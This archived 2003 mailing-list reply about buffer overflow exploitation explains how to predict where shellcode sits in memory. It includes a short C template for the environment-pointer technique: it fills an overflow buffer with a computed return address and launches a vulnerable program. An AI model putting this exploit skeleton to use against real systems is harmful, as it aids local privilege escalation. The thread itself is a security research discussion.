Vulnerability Development mailing list archives
Re: Automatic discovery of shellcode address
From: Marco Ivaldi <raptor () 0xdeadbeef info>
Date: Tue, 25 Mar 2003 01:38:50 +0100 (CET)
On Mon, 24 Mar 2003 steve () uk intasys com wrote:
That wasn't the part that I was considering as being novel. When I've coded things before I've spent most of my time determinig where the return address lies within the area I've overflowed. (By doing a binary search of my 'XXXXXX's). I was thinking that by knowing the address of the buffer in the processes memory space this would reduce the number of trials down to four. (To deal with alignment issues).
If you are exploiting a local vulnerability you can also use the even simpler env pointer technique to locate the shellcode. int main() { char *env[2] = {sc, NULL}; char buf[BUF]; int i; int *ap = (int *)(buf + ALIGN); int ret = 0xbffffffa - strlen(sc) - strlen("./vuln-program"); for (i = 0; i < BUF - 1; i += 4) *ap++ = ret; *ap = 0x0; execle("./vuln-program", "vuln-program", buf, NULL, env); } As you can see, for ./vuln-program shellcode will always be at: 0xbffffffa - strlen(sc) - strlen("./vuln-program") Cheers, :raptor Antifork Research, Inc. 0xdeadbeef | raptor's labs http://www.antifork.org http://www.0xdeadbeef.info
Current thread:
- Automatic discovery of shellcode address steve (Mar 23)
- RE: Automatic discovery of shellcode address Adam Gilmore (Mar 24)
- Re: Automatic discovery of shellcode address steve (Mar 24)
- Re: Automatic discovery of shellcode address Marco Ivaldi (Mar 24)
- Re: Automatic discovery of shellcode address steve (Mar 24)
- Re: Automatic discovery of shellcode address Joel Eriksson (Mar 28)
- RE: Automatic discovery of shellcode address Adam Gilmore (Mar 24)